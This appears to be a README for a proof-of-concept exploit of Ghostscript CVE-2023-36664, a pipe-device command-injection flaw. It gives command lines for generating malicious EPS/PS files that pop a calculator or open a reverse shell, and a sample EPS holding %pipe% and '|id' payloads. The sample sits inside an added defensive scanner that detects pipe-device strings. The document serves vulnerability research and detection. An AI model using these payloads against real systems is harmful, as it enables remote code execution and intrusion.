
Ghostscript command injection vulnerability PoC (CVE-2023-36664)

A vulnerability disclosed in Ghostscript versions prior to 10.01.2 leads to code execution (CVSS score 9.8).

Official vulnerability description:

Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).

Debian released a security advisory mentioning possible execution of arbitrary commands:

"It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed."

This repo was created for a CVE analysis blog post available on the vsociety blog.

Exploitation

Download Ghostscript 10.01.1 here: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011

Direct link to the Windows x64 executable: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

Exploitation can occur when a PS or EPS file is opened, and can lead to code execution because Ghostscript mishandles permission validation for pipe devices.
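As an added defensive example (this is not part of the repo's code): a small Python scanner that parses the PostScript string literals in a PS/EPS document and flags any that name a pipe device with the %pipe% or | prefix described above. It decodes backslash escapes, so an octal-escaped spelling of the prefix is still caught, and it skips PostScript comments to avoid false positives. The sample document and the device names in it are constructed for the demo.

```python
import re

# The two pipe-device spellings named in the CVE-2023-36664 description.
PIPE_PREFIXES = (b"%pipe%", b"|")

def extract_ps_strings(data: bytes):
    """Yield (offset, decoded) for each PostScript literal string "( ... )", honouring
    nested parentheses and backslash escapes (\\( \\) \\\\ \\n and \\ddd octal)."""
    i, n = 0, len(data)
    while i < n:
        c = data[i:i + 1]
        if c == b"%":                                   # comment: skip to end of line
            nl = data.find(b"\n", i)
            i = n if nl < 0 else nl
        elif c == b"(":
            start, depth, out = i, 1, bytearray()
            i += 1
            while i < n and depth:
                c = data[i:i + 1]
                if c == b"\\":                          # escape sequence
                    i += 1
                    e = data[i:i + 1]
                    if e and e in b"01234567":          # \ddd octal byte, e.g. \045 == '%'
                        digits = re.match(rb"[0-7]{1,3}", data[i:i + 3]).group(0)
                        out.append(int(digits, 8) & 0xFF)
                        i += len(digits)
                        continue
                    out += {b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(e, e)
                elif c in (b"(", b")"):                 # balanced nesting inside strings
                    depth += 1 if c == b"(" else -1
                    if depth:
                        out += c
                else:
                    out += c
                i += 1
            yield start, bytes(out)
        else:
            i += 1

def find_pipe_devices(data: bytes):
    """Return [(offset, decoded_string)] for every string literal naming a pipe device."""
    return [(off, s) for off, s in extract_ps_strings(data)
            if s.lstrip().startswith(PIPE_PREFIXES)]

# Constructed sample: a harmless comment, an OutputFile whose prefix hides behind
# octal escapes, and a bare "|" device handed to the file operator.
SAMPLE_EPS = b"""%!PS-Adobe-3.0 EPSF-3.0
% comment only: (%pipe%not-a-string)
<< /OutputFile (\\045pipe\\045notepad) >> setpagedevice
(|id) (w) file
"""
```

A hit is a strong indicator that the document should be quarantined rather than rendered, not proof of exploitation; patching Ghostscript remains the actual fix.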

Usage: python3 CVE_2023_36664_exploit.py <input_file> <command>

Example:

python3 CVE_2023_36664_exploit.py file.eps "calc"

This generates a new file called file_injected.eps.

Open this with Ghostscript to trigger the calculator (since version 9.50 you also have to use the -dNOSAFER option):

gs10011w64.exe -dNOSAFER .\file_injected.eps

Other examples:

Generate a new EPS file called run_calculator.eps with payload "calc" (pops up a new calculator on Windows)

python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

Generate a new EPS file called rev_shell.eps with a custom IP and port (starts a reverse shell when triggered on Unix)

python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

Generate a new PS file called malicius.ps with payload "calc" (pops up a new calculator on Windows)

python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

Inject a malicious custom payload ("calc") into an existing file called file.eps (pops up a new calculator on Windows)

python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
